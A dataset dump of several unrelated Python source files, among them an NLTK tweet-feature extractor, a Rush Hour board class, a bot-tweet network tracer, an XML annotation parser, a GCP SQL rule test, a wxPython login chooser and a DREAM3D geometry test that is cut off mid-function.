{'CC':0,'CD':0,'DT':0,'EX':0,'FW':0,'IN':0,'JJ':0,'JJR':0,'JJS':0,'LS':0,'MD':0,'NN':0,'NNS':0,'NNP':0,'NNPS':0, 'PDT':0,'POS':0,\n 'PRP':0,'PRP$':0,'RB':0,'RBR':0,'RBS':0,'RP':0,'TO':0,'UH':0,'VB':0,'VBD':0,'VBG':0,'VBN':0,'VBP':0,'VBZ':0,'WDT':0,'WP':0,'WP$':0,\n 'WRB':0}\n \n for i in tokenized:\n words = nltk.word_tokenize(i)\n tagged = nltk.pos_tag(words) \n \n for j in range(len(tagged)):\n x = tagged[j]\n y = x[1]\n if(y in posDict):\n count = int(posDict[y])\n posDict[y] = count+1\n \n return posDict\n \n \n def getSentimentNLTK(self,tweetSentence):\n score = []\n try:\n #print('==============getSentimentNLTK starts ====================')\n sid = SentimentIntensityAnalyzer()\n sentimentScore = sid.polarity_scores(tweetSentence)\n score.append(sentimentScore['neu']) \n score.append(sentimentScore['neg']) \n score.append(sentimentScore['pos']) \n score.append(sentimentScore['compound']) \n #print(tweetSentence)\n #print('score = ',score)\n #print('==============getSentimentNLTK ends ====================')\n except :\n score = [0,0,0,0]\n #print('score = ',score)\n return score \n \n def dictToList(self,dictionaryNew):\n self.CCList.append(dictionaryNew['JJS'])\n self.CDList.append(dictionaryNew['POS'])\n self.DTList.append(dictionaryNew['VBD'])\n self.EXList.append(dictionaryNew['NN'])\n self.FWList.append(dictionaryNew['RP'])\n self.INList.append(dictionaryNew['TO'])\n self.JJList.append(dictionaryNew['JJ'])\n self.JJRList.append(dictionaryNew['RB'])\n self.JJSList.append(dictionaryNew['VBG'])\n self.LSList.append(dictionaryNew['UH'])\n self.MDList.append(dictionaryNew['IN'])\n self.NNList.append(dictionaryNew['WDT'])\n self.NNSList.append(dictionaryNew['EX'])\n self.NNPList.append(dictionaryNew['PDT'])\n self.NNPSList.append(dictionaryNew['VB'])\n self.PDTList.append(dictionaryNew['NNS'])\n self.POSList.append(dictionaryNew['LS'])\n self.PRPList.append(dictionaryNew['NNPS'])\n self.PRPDList.append(dictionaryNew['NNP'])\n self.RBList.append(dictionaryNew['WRB'])\n self.RBRList.append(dictionaryNew['JJR'])\n self.RBSList.append(dictionaryNew['VBZ'])\n self.RPList.append(dictionaryNew['CD'])\n self.TOList.append(dictionaryNew['WP'])\n self.UHList.append(dictionaryNew['PRP'])\n self.VBList.append(dictionaryNew['RBR'])\n self.VBDList.append(dictionaryNew['DT'])\n self.VBGList.append(dictionaryNew['FW'])\n self.VBNList.append(dictionaryNew['MD'])\n self.VBPList.append(dictionaryNew['CC'])\n self.VBZList.append(dictionaryNew['VBN'])\n self.WDTList.append(dictionaryNew['VBP'])\n self.WPList.append(dictionaryNew['WP'])\n self.WPDList.append(dictionaryNew['RBS'])\n self.WRBList.append(dictionaryNew['PRP'])\n \n \n \n \n \n \n def __init__(self): \n self.dict1 = {}\n self.dictCount = {}\n self.hashtagList = list()\n self.hashtagCount = list()\n self.directMessageList = list()\n self.urlChkList = list()\n self.hashTagList = list()\n self.questionMarkList = list()\n self.exclamationMarkList = list()\n self.positiveList = list()\n self.negativeList = list()\n self.neutralList = list()\n self.combinedList = list()\n self.positiveEmoticon = list()\n self.negativeEmoticon = list()\n self.posDictList = list()\n self.originalScore = list()\n self.CCList=list()\n self.CDList=list()\n self.DTList=list()\n self.EXList=list()\n self.FWList=list()\n self.INList=list()\n self.JJList=list()\n self.JJRList=list()\n self.JJSList=list()\n self.LSList=list()\n self.MDList=list()\n self.NNList=list()\n self.NNSList=list()\n self.NNPList=list()\n self.NNPSList=list()\n self.PDTList=list()\n self.POSList=list()\n self.PRPList=list()\n self.PRPDList=list()\n self.RBList=list()\n self.RBRList=list()\n self.RBSList=list()\n self.RPList=list()\n self.TOList=list()\n self.UHList=list()\n self.VBList=list()\n self.VBDList=list()\n self.VBGList=list()\n self.VBNList=list()\n self.VBPList=list()\n self.VBZList=list()\n self.WDTList=list()\n self.WPList=list()\n self.WPDList=list()\n self.WRBList=list()\n \n \n \n \n \n def directMsg(self,tweetText):\n if('@' in tweetText ):\n self.directMessageList.append(1)\n else:\n self.directMessageList.append(0)\n \n def urlCheck(self,tweetText):\n if('https' in tweetText):\n self.urlChkList.append(1)\n else:\n self.urlChkList.append(0)\n \n def hashCheck(self,tweetText):\n if('#' in tweetText):\n self.hashTagList.append(1)\n else:\n self.hashTagList.append(0)\n \n def questionCheck(self,tweetText):\n if('?' in tweetText):\n self.questionMarkList.append(1)\n else:\n self.questionMarkList.append(0)\n \n def exclamationCheck(self,tweetText):\n if('!' in tweetText):\n self.exclamationMarkList.append(1)\n else:\n self.exclamationMarkList.append(0)\n \n def checkEmoticon(self,tweetText):\n if(':)' in tweetText):\n self.positiveEmoticon.append(1)\n else:\n self.positiveEmoticon.append(0)\n \n if(':(' in tweetText):\n self.negativeEmoticon.append(1)\n else:\n self.negativeEmoticon.append(0)\n \n def features(self,path):\n dirs = os.listdir( path )\n for file in dirs:\n filename = path+file\n print(filename)\n df = pd.read_csv(filename)\n dfList = df.values.tolist()\n for i in range(len(dfList)):\n type = dfList[i][0]\n text = dfList[i][1]\n self.directMsg(text[1:len(text)])\n self.urlCheck(text[1:len(text)])\n self.hashCheck(text[1:len(text)])\n self.questionCheck(text[1:len(text)])\n self.exclamationCheck(text[1:len(text)])\n sentiScore = self.getSentimentNLTK(text[1:len(text)])\n self.neutralList.append(sentiScore[0])\n self.negativeList.append(sentiScore[1])\n self.positiveList.append(sentiScore[2])\n self.combinedList.append(sentiScore[3])\n self.checkEmoticon(text[1:len(text)])\n posDict = self.findPoS(text[1:len(text)])\n self.dictToList(posDict)\n self.posDictList.append(posDict)\n self.originalScore.append(dfList[i][2])\n \n \n \n \n \n directMsg = pd.DataFrame(self.directMessageList)\n urlCheck = pd.DataFrame(self.urlChkList)\n hashCheck = pd.DataFrame(self.hashTagList)\n questionCheck = pd.DataFrame(self.questionMarkList)\n exclamationCheck = pd.DataFrame(self.exclamationMarkList)\n neutralList = pd.DataFrame(self.neutralList)\n negativeList = pd.DataFrame(self.negativeEmoticon)\n positiveList = pd.DataFrame(self.positiveEmoticon)\n combinedList = pd.DataFrame(self.combinedList)\n CCListDf = pd.DataFrame(self.CCList)\n CDListDf = pd.DataFrame(self.CDList)\n DTListDf = pd.DataFrame(self.DTList)\n EXListDf = pd.DataFrame(self.EXList)\n FWListDf = pd.DataFrame(self.FWList)\n INListDf = pd.DataFrame(self.INList)\n JJListDf = pd.DataFrame(self.JJList)\n JJRListDf = pd.DataFrame(self.JJRList)\n JJSListDf = pd.DataFrame(self.JJSList)\n LSListDf = pd.DataFrame(self.LSList)\n MDListDf = pd.DataFrame(self.MDList)\n NNListDf = pd.DataFrame(self.NNList)\n NNSListDf = pd.DataFrame(self.NNSList)\n NNPListDf = pd.DataFrame(self.NNPList)\n NNPSListDf = pd.DataFrame(self.NNPSList)\n PDTListDf = pd.DataFrame(self.PDTList)\n POSListDf = pd.DataFrame(self.POSList)\n PRPListDf = pd.DataFrame(self.PRPList)\n PRPDListDf = pd.DataFrame(self.PRPDList)\n RBListDf = pd.DataFrame(self.RBList)\n RBRListDf = pd.DataFrame(self.RBRList)\n RBSListDf = pd.DataFrame(self.RBSList)\n RPListDf = pd.DataFrame(self.RPList)\n TOListDf = pd.DataFrame(self.TOList)\n UHListDf = pd.DataFrame(self.UHList)\n VBListDf = pd.DataFrame(self.VBList)\n VBDListDf = pd.DataFrame(self.VBDList)\n VBGListDf = pd.DataFrame(self.VBGList)\n VBNListDf = pd.DataFrame(self.VBNList)\n VBPListDf = pd.DataFrame(self.VBPList)\n VBZListDf = pd.DataFrame(self.VBZList)\n WDTListDf = pd.DataFrame(self.WDTList)\n WPListDf = pd.DataFrame(self.WPList)\n WPDListDf = pd.DataFrame(self.WPDList)\n WRBListDf = pd.DataFrame(self.WRBList)\n scoreDf = pd.DataFrame(self.originalScore)\n \n frames = [directMsg, urlCheck, hashCheck, questionCheck, exclamationCheck, neutralList, negativeList,positiveList, combinedList,\n CCListDf,CDListDf,DTListDf,EXListDf,FWListDf,INListDf,JJListDf,JJRListDf,JJSListDf,LSListDf,MDListDf,NNListDf,NNSListDf,\n NNPListDf,NNPSListDf,PDTListDf,POSListDf,PRPListDf,PRPDListDf,RBListDf,RBRListDf,RBSListDf,RPListDf,TOListDf,UHListDf,\n VBListDf,VBDListDf,VBGListDf,VBNListDf,VBPListDf,VBZListDf,WDTListDf,WPListDf,WPDListDf,WRBListDf,scoreDf]\n \n \n \n result = pd.concat(frames,axis=1)\n result.to_csv(\"..\\\\shorttext\\\\labled\\\\not_marged_result\\\\\"+file.split(\".\")[0]+\".csv\")\n\n print(\"..\\\\shorttext\\\\labled\\\\not_marged_result\\\\\"+file.split(\".\")[0]+\".csv\")\n\npath = \"..\\\\shorttext\\\\labled\\\\not_marged\\\\\"\n\nextrctFeature = ExtractFeature()\nextrctFeature.features(path) ","sub_path":"source/ExtractFeature.py","file_name":"ExtractFeature.py","file_ext":"py","file_size_in_byte":11304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"157275781","text":"from app import db, models\nfrom app.models import Section, Survey, Consent\nimport json\n\ndef survey_to_json(survey):\n json_survey = [{\n 'title': survey.title,\n 'description': survey.description,\n 'created': survey.created,\n 'startDate': survey.startDate,\n 'endDate': survey.endDate,\n 'maxNumberRespondents': survey.maxNumberRespondents,\n # 'consents': survey.consents.to_json()\n }]\n return json.dumps(json_survey,indent=2)\n\ndef survey_from_json(survey):\n pass\n\ndef consent_to_json(consent):\n json_survey = {\n 'text': consent.text,\n }\n return json_survey\n\n","sub_path":"pruebas/testJson.py","file_name":"testJson.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"505281234","text":"############################################################\n# Imports\n############################################################\nimport game_helper as gh\nfrom car import Car, Direction\nimport math\n############################################################\n# Constants\n############################################################\n\n# place your constants here\nERROR_MSG_CAR_NOT_ADDED = \"The car wasn't added to the board\"\nERROR_MSG_LOCATION_IS_OUT_OF_BOUNDS = \"The car location is out of the board\"\nERROR_MSG_LOCATION_TAKEN = \"The location is already been taken\"\nERROR_MSG_ONLY_ONE_SQUARE = \"you only can move one square at the time\"\nCAR_ADDED = \"A car was added successfully!\"\nWRONG_DIRECTION = \"unavail direction\"\nOUT_BOUNDS_MSG = \"Can't move the car - out of bounds \" \\\n \"(can't move the car outside the table game)\"\n############################################################\n# Class definition\n############################################################\n\n\n\nclass Board():\n \"\"\"\n A class representing a rush hour board.\n \"\"\"\n\n def __init__(self, cars, exit_board, size=6):\n \"\"\"\n Initialize a new Board object.\n :param cars: A list (@or dictionary) of cars. @can be empty\n :param size: Size of board (Default size is 6). \n \"\"\"\n # implement your code here (and then delete the next line - 'pass')\n self.cars = cars\n self.exit_board = exit_board\n self.size = size\n self.height = size\n self.width = size\n\n def get_cars(self):\n return self.cars\n\n def add_car(self, car):\n \"\"\"\n Add a single car to the board.\n :param car: A car object\n :return: True if a car was succesfuly added, or False otherwise.\n \"\"\"\n \"\"\"checking if the coordination is empty, is so, add the car to the \n board and return True, else return False\"\"\"\n if self.is_empty(car.get_location()):\n self.cars.append(car)\n print(CAR_ADDED)\n return True\n print(ERROR_MSG_CAR_NOT_ADDED)\n return False\n\n def is_empty(self, location):\n \"\"\"\n Check if a given location on the board is free.\n :param location: x and y coordinations of location to be check\n :return: True if location is free, False otherwise\n \"\"\"\n \"\"\"checking if the location is empty or not, it the location empty \n return True else return False\"\"\"\n if not 0 <= location[0] < self.size or not 0 <= location[1] < self.size:\n # out of bound\n print(OUT_BOUNDS_MSG)\n return False\n for car in self.cars:\n if car.orientation == 0:\n x, y = location\n x1, y1 = car.get_location()\n if x == x1 and y == y1:\n # location is already been taken by other car\n return False\n elif car.orientation == 1:\n for i in range(0, car.length):\n x, y = location\n x1, y1 = car.get_location()\n if x == x1 and y == y1+i:\n # location is already been taken by other car\n return False\n return True\n\n def move(self, car, direction):\n \"\"\"\n Move a car in the given direction.\n :param car: A Car object to be moved.\n :param direction: A Direction object representing desired direction\n to move car.\n :return: True if movement was possible and car was moved, False otherwise.\n \"\"\"\n # implement your code here (and then delete the next line - 'pass')\n new_location = car.get_location()[:]\n new_location1 = car.get_location()[:]\n new_location = list(new_location)\n lenn = car.length\n if car.orientation == 0:\n if direction == 8:\n new_location[0] -= 1\n elif direction == 2:\n new_location[0] += lenn\n else:\n print(WRONG_DIRECTION)\n return False\n elif car.orientation == 1:\n if direction == 6:\n new_location[1] += lenn\n elif direction == 4:\n new_location[1] -= 1\n else:\n print(WRONG_DIRECTION)\n return False\n if self.is_empty(new_location):\n if direction == 2:\n new_location[0] = new_location[0] - lenn + 1\n elif direction == 6:\n new_location[1] = new_location[1] - lenn + 1\n car.set_location(new_location)\n return True\n else:\n print(ERROR_MSG_LOCATION_TAKEN)\n return False\n\n def __repr__(self):\n \"\"\"\n :return: Return a string representation of the board.\n \"\"\"\n final_lst = []\n for i in range(0, self.size):\n temp_listt = []\n for i in range(0, self.size):\n temp_listt.append('_')\n final_lst.append(temp_listt)\n\n for car in self.cars:\n car_color = car.color\n car_location = car.get_location()\n if car.orientation == 0:\n for k in range(0, car.length):\n x, y = car_location\n final_lst[x+k][y] = car_color\n elif car.orientation == 1:\n for j in range(0, car.length):\n x, y = car_location\n final_lst[x][y+j] = car_color\n car_exit_location = self.exit_board\n x, y = car_exit_location\n final_lst[x][y] += 'E'\n return str(print_lst(final_lst))\n\n\ndef print_lst(final_lst):\n for i in range(0, len(final_lst)):\n print(final_lst[i])\n return ''\n","sub_path":"Python/EX8 - Car Game - release the red car/temp/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510927359","text":"import pandas as pd\nimport numpy as np\nfrom os import path\nimport time\nimport subprocess\nfrom subprocess import PIPE\nimport ast\n\n###################DataFrames:#####################################\n#Read File of all the unique userids of the bots that tweeted messages regarding to the 2016 elections.\ndfn = pd.read_csv(\"/root/.encrypted/.pythonSai/kCoreBots/CoreBotEN/MachineLearning/NaiveBayes/ListIDS.csv\", sep=\"\\n\", skiprows=[0], header=None, usecols=[0], names=[\"userid\"])\n#Dataframe that will store, a dictionary contaning the network of a certain tweet between a sequence of bots, in each cell.\ndfd = pd.DataFrame(columns=[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"])\n\ntil=[] #List that contains the tweet ids for all the bots in the network.\nuil=[]\t#List that contais userids of all the bots in the network.\nntl=[]\t#List that stores the tuples to create the network of the directed flow between a certain tweet between a sequence of bots.\n\n#Iteratring through each bot userid from above [i.e. iterating through every bot's file in present working directory].\nfor i in dfn.index:\n\tif(i>887):\n\t\tprint(i)\n\t\tfsn = \"/root/.encrypted/.pythonSai/kCoreBots/CoreBotEN/MachineLearning/NaiveBayes/CoreBotsSentiment/Bot-\"+str(dfn[\"userid\"][i])+\"-EN.csv\"\n\t\tif(path.isfile(fsn)==True): #If such a bots csv file exists in the current directory\n\n\t\t\t#Setup the dataframe that reads each bot's tweet csv file.\n\t\t\tdfi = pd.read_csv(fsn, sep=\",\", header=None, names=[\"tweetid\",\"userid\",\"tweet_candidate_class\",\"tweet_sentiment_class\"])\n\t\t\t#Iterating through each political tweet sent by both during the 2016 elections read from the bot's file present in the current working directory.\n\t\t\tfor j in dfi.index:\n\t\t\t\tprint(\"start new\")\n\t\t\t\tt0 = time.time()\n\t\t\t\tais = \"[ '\"+str(dfi[\"userid\"][j]) + \"' ,'\" + str(dfi[\"tweetid\"][j]) + \"' ,[] ,\" + \"[] ,\" + \"[]]\"\n\t\t\t\t#Run the mainDataframeScript.py from the os.\n\t\t\t\ttsv = subprocess.Popen([\"python3\", \"mainDataframeScript.py\"]+[ais], stdout=PIPE)\t#temporary storage variable.\n\t\t\t\t#Store the output and error of mainDataframeScript.py print statement.\n\t\t\t\t(out, err) = tsv.communicate()\n\t\t\t\t#This makes the wait possible\n\t\t\t\tp_status = tsv.wait()\n\n\t\t\t\tout = ast.literal_eval(out.decode(\"utf-8\"))\n\t\t\t\ttmp = out[0]\t#temporary list\n\t\t\t\tntl = ntl + tmp\n\t\t\t\t#ntl = list(dict.fromkeys(ntl)) #Remove all duplicates from ntl list using \"Dictionary\" data object.\n\t\t\t\t#ntl = [(rm1, bti) if isinstance(bti, tuple) is False else bti for bti in ntl]\n\n\t\t\t\ttmp = out[1]\n\t\t\t\tuil = uil + tmp\n\t\t\t\tuil = list(dict.fromkeys(uil))\n\n\t\t\t\ttmp = out[2]\n\t\t\t\ttil = til + tmp\n\t\t\t\ttil = list(dict.fromkeys(til))\n\n\t\t\t\tt1 = time.time()\n\t\t\t\tprint(\"Time taken to run MainDataframe script = \" + str(out[3])+\"s\")\n\t\t\t\tprint(t1-t0)\n\t\t\t\t#print(uil)\n\t\t\t\tif(uil and uil!=['']):\n\t\t\t\t\t#print(\"uil\")\n\t\t\t\t\t#print(uil)\n\t\t\t\t\t#print(\"ntl\")\n\t\t\t\t\t#print(ntl)\n\t\t\t\t\t#print(\"til\")\n\t\t\t\t\t#print(til)\n\t\t\t\t\t#print(\"\\n\")\n\t\t\t\t\tfor k in range(0,len(uil)):\n\t\t\t\t\t\t#print(k)\n\t\t\t\t\t\t#print(len(uil))\n\t\t\t\t\t\t#print(til[k])\n\t\t\t\t\t\t#print(ntl[k])\n\t\t\t\t\t\tais = \"['\"+str(uil[k]) + \"','\" + \"str(til[k])\" + \"',[] ,\" + \"[] ,\"+ \"[]]\"\n\t\t\t\t\t\ttsv = subprocess.Popen([\"python3\", \"mainDataframeScript.py\"]+[ais], stdout=PIPE) #temporary storage variable.\n\t\t\t\t\t\t#Store the output and error of mainDataframeScript.py print statement.\n\t\t\t\t\t\t(out, err) = tsv.communicate()\n\t\t\t\t\t\t#This makes the wait possible.\n\t\t\t\t\t\tp_status = tsv.wait()\n\n\t\t\t\t\t\tout = ast.literal_eval(out.decode(\"utf-8\"))\n\t\t\t\t\t\ttmp = out[0] #temporary list\n\t\t\t\t\t\tntl = ntl + tmp\n\t\t\t\t\t\t#ntl = list(dict.fromkeys(ntl)) #Remove all duplicates from ntl list using \"Dictionary\" data object.\n\t\t\t\t\t\t#ntl = [(rm1, bti) if isinstance(bti, tuple) is False else bti for bti in ntl]\n\n\t\t\t\t\t\ttmp = out[1]\n\t\t\t\t\t\tuil = uil + tmp\n\t\t\t\t\t\tuil = list(dict.fromkeys(uil))\n\n\t\t\t\t\t\ttmp = out[2]\n\t\t\t\t\t\ttil = til + tmp\n\t\t\t\t\t\ttil = list(dict.fromkeys(til))\n\n\t\t\t\t\t#Inserting row into dataframe to store the entire network of bots that transmitted a particular tweet starting from the originator bot. In this case, the \"first column\"=originator bot userid, \"second column\"=entire network in list format [i.e. ntl]\n\t\t\t\t\tdfd.loc[0] = [dfi[\"userid\"][j], ntl, dfi[\"tweet_candidate_class\"][j], dfi[\"tweet_sentiment_class\"][j]]\t#Also stores #Candidate and Sentiment Classes the network of bots is targetting.\n\t\t\t\t\tdfd[[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"]].to_csv(\"networkUserID.csv\", mode='a', header=False, index=False)\n\t\t\t\t\tdfd.iloc[0:0]\n\t\t\t\t\tntl=[]\n\t\t\t\t\tuil=[]\n\t\t\t\t\ttil=[]\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tdfd.loc[0] = [dfi[\"userid\"][j], ntl, dfi[\"tweet_candidate_class\"][j], dfi[\"tweet_sentiment_class\"][j]] #Also stores #Candidate and Sentiment Classes the network of bots is targetting.\n\t\t\t\t\tdfd[[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"]].to_csv(\"networkUserID.csv\", mode='a', header=False, index=False)\n\t\t\t\t\tdfd.iloc[0:0]\n\t\t\t\t\tntl=[]\n\t\t\t\t\tuil=[]\n\t\t\t\t\ttil=[]\n\t\t\t\t\tbreak\n\n\n############Writing the dataframe to a CSV file:\n#dfd[[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"]].to_csv(\"network.csv\", mode='a', header=False, index=False)\n","sub_path":"kCoreBots/CoreBotEN/MachineLearning/NaiveBayes/CoreBotsSentiment/PythonScripts/directedGraph.py","file_name":"directedGraph.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"502780242","text":"from config import ground_truth_directory, OBJ_NAME, iou_output_path\nimport os\nimport json\nfrom xml.etree import ElementTree as ET\n\n\n# load files\ntruth_ls = []\nfor gt in os.scandir(ground_truth_directory):\n if gt.path.endswith('.xml') and gt.is_file():\n truth_ls.append(gt.path)\ntruth_ls.sort()\n\n\ndef extract_xml(file_name):\n tree = ET.parse(file_name)\n root = tree.getroot()\n xmax = int(root.find(\"./object/bndbox/xmax\").text)\n xmin = int(root.find(\"./object/bndbox/xmin\").text)\n ymax = int(root.find(\"./object/bndbox/ymax\").text)\n ymin = int(root.find(\"./object/bndbox/ymin\").text)\n x = 0.5 * (xmax + xmin)\n y = 0.5 * (ymax + ymin)\n w = xmax - xmin\n h = ymax - ymin\n return [OBJ_NAME, 1, [x, y, w, h]]\n\n\ndef make_csv():\n print('begin to parse xml file ...')\n final_list = []\n for gt_file in truth_ls:\n final_list.append(extract_xml(gt_file))\n with open(iou_output_path + 'ground_truth.json', 'w') as f:\n json.dump(final_list, f, indent=2)\n print('made json file')\n print('-----------------------------------')\n","sub_path":"iou_output/parse_xml.py","file_name":"parse_xml.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"132297797","text":"from unittest import TestCase\nfrom parameterized import parameterized\nfrom cloudrail.dev_tools.rule_test_utils import create_empty_entity\nfrom cloudrail.knowledge.context.gcp.gcp_environment_context import GcpEnvironmentContext\nfrom cloudrail.knowledge.context.gcp.resources.sql.gcp_sql_database_instance import GcpSqlDatabaseInstance, \\\n GcpSqlDBInstanceSettings, GcpSqlDBInstanceSettingsIPConfig, GcpSqlDBInstanceIPConfigAuthNetworks\nfrom cloudrail.knowledge.rules.base_rule import RuleResultType\nfrom cloudrail.knowledge.rules.gcp.non_context_aware.sql_restrict_trusted_ip_rule import \\\n SqlDatabaseRestrictTrustedIpRule\n\n\nclass TestSqlDatabaseSslRequired(TestCase):\n def setUp(self):\n self.rule = SqlDatabaseRestrictTrustedIpRule()\n\n @parameterized.expand(\n [\n [\"cloud sql private ip\", \"8.8.4.0/24\", \"35.198.0.0/16\", False],\n [\"cloud sql private and open ip\", \"8.8.4.0/24\", \"0.0.0.0/0\", True]\n ]\n )\n\n def test_cloud_sql_restrict_trusted_ip(self, unused_name: str, config_auth_networks_value_1: str,config_auth_networks_value_2: str, should_alert: bool):\n # Arrange\n sql = create_empty_entity(GcpSqlDatabaseInstance)\n sql.name = 'name'\n authorized_networks = [GcpSqlDBInstanceIPConfigAuthNetworks(value=config_auth_networks_value_1, name=None, expiration_time=None),\n GcpSqlDBInstanceIPConfigAuthNetworks(value=config_auth_networks_value_2, name=None, expiration_time=None)]\n ip_configuration = GcpSqlDBInstanceSettingsIPConfig(authorized_networks=authorized_networks,\n ipv4_enabled=None, private_network=None, require_ssl=None)\n settings = create_empty_entity(GcpSqlDBInstanceSettings)\n settings.ip_configuration = ip_configuration\n sql.settings = settings\n context = GcpEnvironmentContext(sql_database_instances=[sql])\n # Act\n result = self.rule.run(context, {})\n # Assert\n if should_alert:\n self.assertEqual(RuleResultType.FAILED, result.status)\n self.assertEqual(1, len(result.issues))\n else:\n self.assertEqual(RuleResultType.SUCCESS, result.status)\n self.assertEqual(0, len(result.issues))\n","sub_path":"tests/knowledge/rules/gcp/non_context_aware/test_sql_database_restrict_trusted_ip.py","file_name":"test_sql_database_restrict_trusted_ip.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"422019241","text":"import wx\r\nimport sqlite3\r\nfrom Users登录 import *\r\nfrom DBM登录 import *\r\n\r\nclass Choice(wx.Frame):\r\n def __init__(self, parent, id):\r\n wx.Frame.__init__(self, parent, id, title = \"登录选择\", pos = (700, 300), size =(400, 300))\r\n panel = wx.Panel(self)\r\n text = wx.StaticText(panel, label = \"请选择登录的方式\", pos = (140, 70))\r\n text.SetForegroundColour(\"Black\")\r\n self.bt1 = wx.Button(panel, label = \"管理员\", pos = (105, 130))\r\n self.bt2 = wx.Button(panel, label = \"普通用户\", pos = (195, 130))\r\n self.bt1.Bind(wx.EVT_BUTTON, self.bt1_f)\r\n self.bt2.Bind(wx.EVT_BUTTON, self.bt2_f)\r\n\r\n def bt1_f(self,event):\r\n self.Destroy()\r\n DBMmain()\r\n def bt2_f(self, event):\r\n self.Destroy()\r\n Loginmain()\r\n\r\nif __name__ == \"__main__\":\r\n app = wx.App()\r\n frame = Choice(None, -1)\r\n frame.Show()\r\n frame.Centre()\r\n app.MainLoop()\r\n","sub_path":"满月客栈/登录选择.py","file_name":"登录选择.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6611462","text":"# Based on CreateQuadGeometry example\n# \n\n# These are the simpl_py python modules\n\nfrom dream3d import simplpy as d3d\nfrom dream3d import simpl\nfrom dream3d import simpl_helpers as sc\nfrom dream3d import simpl_test_dirs as sd\n\ndef CreateQuadGeometryTest():\n # Create Data Container Array\n dca = simpl.DataContainerArray.New()\n\n # Create the Data Container\n err = d3d.create_data_container(dca, \"DataContainer\")\n if err < 0:\n print(\"DataContainer ErrorCondition: %d\" % err)\n\n # Import ASCII Data - #1 - Vertex Coordinates\n importFile = sd.GetBuildDirectory() + \"/Data/SIMPL/VertexCoordinates.csv\"\n wizardData = {\n \"inputFilePath\": importFile,\n \"beginIndex\": 2,\n \"numberOfLines\": 145,\n \"delimiters\": [','], \n \"consecutiveDelimiters\": False,\n \"automaticAM\": True,\n \"selectedPath\": simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"\"),\n \"headers\": [\"x\", \"y\", \"z\"],\n \"attrMatType\": 3,\n \"tupleDimensions\": [144],\n \"dataTypes\": [\"float\", \"float\", \"float\"]\n }\n err = d3d.read_ascii_data(dca, wizardData)\n if err < 0:\n print(\"Import ASCII Data #1 - ErrorCondition: %d\" % err)\n \n\n # Import ASCII Data - #2 - Edge Connectivity\n importFile = sd.GetBuildDirectory() + \"/Data/SIMPL/QuadConnectivity.csv\"\n wizardData = {\n \"inputFilePath\": importFile,\n \"beginIndex\": 2,\n \"numberOfLines\": 122,\n \"delimiters\": [','], \n \"consecutiveDelimiters\": False,\n \"automaticAM\": True,\n \"selectedPath\": simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"\"),\n \"headers\": [\"V0\", \"V1\", \"V2\", \"V3\"],\n \"attrMatType\": 3,\n \"tupleDimensions\": [121],\n \"dataTypes\": [\"int64_t\", \"int64_t\",\"int64_t\", \"int64_t\"]\n } \n err = d3d.read_ascii_data(dca, wizardData)\n if err < 0:\n print(\"Import ASCII Data #2 - ErrorCondition: %d\" % err)\n\n # Combine Attribute Arrays # 1:\n selectedDataArrayPaths = [simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"x\"), \n simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"y\"), \n simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"z\")]\n err = d3d.combine_attribute_arrays(dca, selectedDataArrayPaths, \"Vertices\", False)\n if err < 0:\n print(\"Combined Attribute Arrays #1 - ErrorCondition: %d\" % err)\n\n # Delete Data # 1\n dcap = simpl.DataContainerArrayProxy()\n dcap.getDataContainerProxy(\"DataContainer\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").getDataArrayProxy(\"x\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").getDataArrayProxy(\"y\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").getDataArrayProxy(\"z\").Flag = 2\n err = d3d.remove_arrays(dca, dcap)\n if err < 0:\n print(\"Remove Arrays #1 - ErrorCondition: %d\" % err)\n\n # Combine Attribute Arrays #2:\n selectedDataArrayPaths = [simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V0\"), \n simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V1\"), simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V2\"), \n simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"V3\")]\n err = d3d.combine_attribute_arrays(dca, selectedDataArrayPaths, \"Quads\", False)\n if err < 0:\n print(\"Combined Attribute Arrays #2 - ErrorCondition: %d\" % err)\n\n # Delete Data # 2\n dcap = simpl.DataContainerArrayProxy()\n dcap.getDataContainerProxy(\"DataContainer\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V0\").Flag = 2\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"QuadList\").getDataArrayProxy(\"V1\").Flag = 2\n 